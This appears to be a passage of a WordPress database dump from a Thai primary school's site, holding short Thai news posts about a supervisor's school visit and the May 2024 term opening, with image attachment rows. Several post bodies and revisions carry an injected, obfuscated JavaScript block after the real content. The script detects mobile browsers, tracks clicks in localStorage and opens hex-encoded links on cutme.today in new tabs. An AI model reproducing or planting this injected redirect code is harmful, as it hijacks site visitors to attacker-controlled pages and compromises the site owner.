_0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-28','','','2024-08-01 20:46:02','2024-08-01 13:46:02','',0,'http://pakhaeng.ssk.in.th/?p=420',0,'post','',0),
(421,1,'2024-08-01 20:45:37','2024-08-01 13:45:37','','17-67','','inherit','','closed','','17-67','','','2024-08-01 20:45:37','2024-08-01 13:45:37','',420,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/17-67.png',0,'attachment','image/png',0),
(422,1,'2024-08-01 20:46:01','2024-08-01 13:46:01','<!-- wp:paragraph -->\n<p><strong>เมื่อวันที่ 14 พฤษภาคม พ.ศ.2567 นางปุณกา ธรรมนูญ รอง ผอ.สพป.ศรีสะเกษ เขต 1 ได้ออกตรวจเยี่ยมโรงเรียนบ้านหนองปลาเข็ง กอไหล่ เพื่อเยี่ยมชมความพร้อมของสถานศึกษาก่อเปิดภาคเรียน โดยมีนางเสน่หา พลโสภา ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่ และคณะครู ให้การต้อนรับ พร้อมนำเยี่ยมห้องเรียนของโรงเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":421,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/17-67-724x1024.png\" alt=\"\" class=\"wp-image-421\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','420-revision-v1','','','2024-08-01 20:46:01','2024-08-01 13:46:01','',420,'http://pakhaeng.ssk.in.th/?p=422',0,'revision','',0),
(423,1,'2024-08-01 20:47:09','2024-08-01 13:47:09','<!-- wp:paragraph -->\n<p><strong>วันที่ 16 พฤษภาคม พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้เปิดภาคเรียน ปีการศึกษา 2567 โดย นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน ได้กล่าว พบปะกับนักเรียนในวันเปิดภาคเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":424,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/18-67-724x1024.png\" alt=\"\" class=\"wp-image-424\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ เปิดภาคเรียน','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b9%80%e0%b8%9b%e0%b8%b4','','','2024-08-01 20:47:11','2024-08-01 13:47:11','',0,'http://pakhaeng.ssk.in.th/?p=423',0,'post','',0),
(424,1,'2024-08-01 20:46:53','2024-08-01 13:46:53','','18-67','','inherit','','closed','','18-67','','','2024-08-01 20:46:53','2024-08-01 13:46:53','',423,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/18-67.png',0,'attachment','image/png',0),
(425,1,'2024-08-01 20:47:09','2024-08-01 13:47:09','<!-- wp:paragraph -->\n<p><strong>วันที่ 16 พฤษภาคม พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้เปิดภาคเรียน ปีการศึกษา 2567 โดย นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน ได้กล่าว พบปะกับนักเรียนในวันเปิดภาคเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":424,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/18-67-724x1024.png\" alt=\"\" class=\"wp-image-424\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 